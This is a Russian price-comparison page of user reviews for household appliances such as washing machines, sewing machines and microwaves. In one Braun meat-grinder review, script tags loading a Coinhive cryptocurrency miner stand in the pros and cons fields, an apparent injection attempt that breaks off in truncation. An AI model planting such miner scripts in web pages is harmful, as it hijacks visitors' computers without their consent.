Omar.ru  — лучшие цены в интернете  
Например: Кондиционеры, Телевизоры
Москва
Москва

Выбор региона

Если вы хотите посмотреть предложения магазинов из других регионов воспользуйтесь формой ниже.
Введите регион:
- -
Omar.ruГлавная » Отзывы » Бытовая техника

Отзывы. Бытовая техника

Производители
НГОСЯ, 15 мая 2018 г.

Отзыв о воздухоочистителе Аэролайф

оценка

9
Модель: Аэролайф
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
При почти непрерывной работе в течении 3-х месяцев отмечено,что дети стали болеть гораздо меньше.Но пыль как была так и Подробнее
 
НЕДОСТАТКИ
Гудит ночью даже в ночном режиме и сильно холодит зимой
МОЁ МНЕНИЕ: С-80
МОЙ СОВЕТ: Я рекомендую эту модель.
LED телевизор Doffler 32ch ..
Цена: 14 490 руб.
RBT.ru Курган
LED телевизор Doffler 43cf ..
Цена: 22 990 руб.
RBT.ru Ноябрьск
LED телевизор Doffler 32ch ..
Цена: 13 990 руб.
RBT.ru Ноябрьск
LED телевизор Doffler 32ch ..
Цена: 14 490 руб.
RBT.ru Ноябрьск
LED телевизор Doffler 43cf ..
Цена: 22 990 руб.
RBT.ru Курган
LED телевизор Doffler 24ch ..
Цена: 9 490 руб.
RBT.ru Ноябрьск
Сергей, 02 мая 2018 г.

Отзыв о водонагревателе Успех 200л

оценка

8
Модель: Успех 200л
Срок использования: больше 5 лет
Количество поломок: была 2 поломки
ДОСТОИНСТВА
Очень удобен
 
НЕДОСТАТКИ
Плохой доступ для замены тена и после 10 лет начинает течь по швам
МОЁ МНЕНИЕ: Хочу заменить на новый меня устраивает
МОЙ СОВЕТ: Я рекомендую эту модель.
Елена, 06 апреля 2018 г.

Отзыв о стиральной машине Korting KWA 50085 R

оценка

10
Модель: Korting KWA 50085 R
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
Одни плюсы
 
НЕДОСТАТКИ
нет
МОЁ МНЕНИЕ: Долго решалась на столь недешевую стиральную машинку, но с учетом того, что она стирает да еще и сушит белье, то вопрос отпал сам собой. Загрузка позволяет стирать объемные вещи, такие как пледы. одеяла, подушки и много другое. Я ее вообще не жалею, стираю Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Дмитрий, 03 апреля 2018 г.

Отзыв о микроволновой печи Polar W707M-17

оценка

10
Модель: Polar W707M-17
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Отличная сборка. Ничего не ломалось, работает до сих пор. Со своей задачей (разогрев и разморозка) справляется без проблем. Решил написать отзыв так как продал ее на вторичном рынке. Обычная безпроблемная микроволновка. Сказать даже нечего...)))
МОЙ СОВЕТ: Я рекомендую эту модель.
Вера, 27 марта 2018 г.

Отзыв о стиральной машине Zanussi FLS 872 C

оценка

10
Модель: Zanussi FLS 872 C
Срок использования: больше 5 лет
Количество поломок: была 1 поломка
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: В эксплуатации 17 лет,8 лет назад замена двигателя,до сих пор работает.
МОЙ СОВЕТ: Я рекомендую эту модель.
Евгений, 25 марта 2018 г.

Отзыв о стиральной машине Zanussi WD 1601

оценка

10
Модель: Zanussi WD 1601
Срок использования: больше 5 лет
Количество поломок: было 4 поломки
ДОСТОИНСТВА
Шикарная машина за умеренные деньги
 
НЕДОСТАТКИ
Отсутствуют индикаторы текущих этапов выполнения программы, отсутствует индикатор включения нагрева воды. Снята с Подробнее
МОЁ МНЕНИЕ: По-настоящему "умная" машина, вплоть до того, что можно доложить забытую вещь в процессе стирки и если воды не много, дверцу можно будет открыть сразу же. Стирает идеально direct spray - супер! Дизайн очень оригинальный- не надо сгибаться в три Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Дина, 05 марта 2018 г.

Отзыв о швейной машинке Jaguar 6434

оценка

10
Модель: Jaguar 6434
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
нить не рвет, строчки ровные
 
НЕДОСТАТКИ
нет
МОЁ МНЕНИЕ: После старой бабушкиной швейной машинки моя новая Jaguar конечно просто космос. Меня сразу продавец предупредил, что лучше на ней плотные ткани не шить, а мне сразу надо было новые джинсы подшить мужу. Рискнула-прошила, всё отлично. Ни разу машинка не Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Виктор, 03 марта 2018 г.

Отзыв о стиральной машине Ardo TL 800 EX

оценка

10
Модель: Ardo TL 800 EX
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
Компактность, нет лишних примочек, проста в эксплуатации.
 
НЕДОСТАТКИ
За 9 лет эксплуатации, пока, нет.
МОЁ МНЕНИЕ: Машинку эксплуатируем 9лет. Никаких проблем не возникало. Трудяга. Необходимо только не забывать элементарные рекомендации по уходу.
МОЙ СОВЕТ: Я рекомендую эту модель.
UPFOX, 22 февраля 2018 г.

Отзыв о мясорубке Braun G 1300 K

оценка

9
Модель: Braun G 1300 K
Срок использования: больше года
Количество поломок: поломок не было
ДОСТОИНСТВА
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
 
НЕДОСТАТКИ
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new Подробнее
МОЁ МНЕНИЕ: sdg h
МОЙ СОВЕТ: Я рекомендую эту модель.
Галина Леонидовна, 09 февраля 2018 г.

Отзыв о мясорубке Braun G 1300 K

оценка

9
Модель: Braun G 1300 K
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
Скорость хорошая, мощная, как на промышленной.
 
НЕДОСТАТКИ
Шумит, конечно, здорово, закрываю дверь в кухне.
МОЁ МНЕНИЕ: Пользуюсь с 2008 года. Немного изменился звук при работе.
МОЙ СОВЕТ: Я рекомендую эту модель.
Галина, 04 февраля 2018 г.

Отзыв о пылесосе BORK V601

оценка

3
Модель: BORK V601
Срок использования: менее года
Количество поломок: поломок не было
ДОСТОИНСТВА
Выполняет все функции, которые должен Не более!
 
НЕДОСТАТКИ
Непонятно из чего сложена такая цена
МОЁ МНЕНИЕ: Пылесосом пользуюсь полтора месяца. Полное разочарование жаль потраченных денег. Можно было купить модель гораздо дешевле, разницы бы не заметила. Обычный пылесос, просто, распиаренный. Вот и я повелась на отзывы. Неспорую, пылесос хорош, но денег таких СОВСЕМ Подробнее
МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
Алла, 20 января 2018 г.

Отзыв о стиральной машине Whirlpool AWE 7515

оценка

5
Модель: Whirlpool AWE 7515
Срок использования: больше 5 лет
Количество поломок: была 1 поломка
ДОСТОИНСТВА
Удобная в эксплуатации в небольшой ванной.
 
НЕДОСТАТКИ
При открытой крышке после стирки вода стекает и попадает в щель между открытой крышкой и панелью управления, от этого Подробнее
МОЁ МНЕНИЕ: Удобная,но недостаток из за непродуманности защиты верхней крышки от ржавчины.
МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
Ирина, 15 января 2018 г.

Отзыв о стиральной машине Candy Activa Smart 1040

оценка

10
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
ПОКУПАЙТЕ,НЕ ПОЖАЛЕЕТЕ
 
НЕДОСТАТКИ
НИ ОДНОГО НЕ НАШЛА ЗА 10 лет,(хотя я еще та противоза)!
МОЁ МНЕНИЕ: у меня тоже канди вертикалка в 2007 году покупала.За все эти 10 лет стирала как нодо,чисто,вот только не все порошки могла принимать.Только качественными порошками типа лоск,ариэль,персил, для носков миф. Пробовала раз тайд и еще какой то на б бедняжка так Подробнее
МОЙ СОВЕТ: Я рекомендую эту модель.
Геннадий, 12 января 2018 г.

Отзыв о стиральной машине Hotpoint-Ariston TX 100 EX

оценка

10
Срок использования: больше 5 лет
Количество поломок: была 1 поломка
ДОСТОИНСТВА
Все 10 баллов
 
НЕДОСТАТКИ
нет
МОЁ МНЕНИЕ: Работяга с большой буквы.Работает более 15 лет.Одна поломка была, перестал работать слив.В данный момент хочу провести диагностику,если будет еще служить и далее то она останется хозяйкой в нашей кв.и далее.
МОЙ СОВЕТ: Я рекомендую эту модель.
Наталья, 07 января 2018 г.

Отзыв о швейной машинке Necchi 559

оценка

10
Модель: Necchi 559
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Шью на ней 18 лет шила все поломок небыло машинкой очень довольна
МОЙ СОВЕТ: Я рекомендую эту модель.
Наталья, 07 января 2018 г.

Отзыв о швейной машинке Necchi 559

оценка

10
Модель: Necchi 559
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Шью на ней 18 лет шила все поломок небыло машинкой очень довольна
МОЙ СОВЕТ: Я рекомендую эту модель.
Наталья, 07 января 2018 г.

Отзыв о швейной машинке Necchi 559

оценка

10
Модель: Necchi 559
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Шью на ней 18 лет шила все поломок небыло машинкой очень довольна
МОЙ СОВЕТ: Я рекомендую эту модель.
Наталья, 07 января 2018 г.

Отзыв о швейной машинке Necchi 559

оценка

10
Модель: Necchi 559
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: Шью на ней 18 лет шила все поломок небыло машинкой очень довольна
МОЙ СОВЕТ: Я рекомендую эту модель.
Эвелина, 05 января 2018 г.

Отзыв о холодильнике Bauknecht KGN 5887 A3+ FRESH PT

оценка

1
Срок использования: 3 года
Количество поломок: была 1 поломка
ДОСТОИНСТВА
Работал бесшумно.
 
НЕДОСТАТКИ
Продавать марку на которую нет сервиса даже в Санкт-Петербурге и претендует на "премиум" -БЕЗОТВЕТСТВЕННО!!!
МОЁ МНЕНИЕ: Никому не рекомендую эту технику.После окончания гарантии отработал ровно 4 месяца!!!И это при его цене в 74тыс.За его ремонт сервисный центры не берутся,они чинят только по гарантии!!Полетел инжекторный компрессор и плата.Сервис,который не является Подробнее
МОЙ СОВЕТ: Я НЕ рекомендую эту модель.
Вера, 05 января 2018 г.

Отзыв о микроволновой печи Elenberg MS-2015D

оценка

10
Модель: Elenberg MS-2015D
Срок использования: больше 5 лет
Количество поломок: поломок не было
ДОСТОИНСТВА
гриль и разморозка и греет .простая в использование
 
НЕДОСТАТКИ
МОЁ МНЕНИЕ: очень крутая
МОЙ СОВЕТ: Я рекомендую эту модель.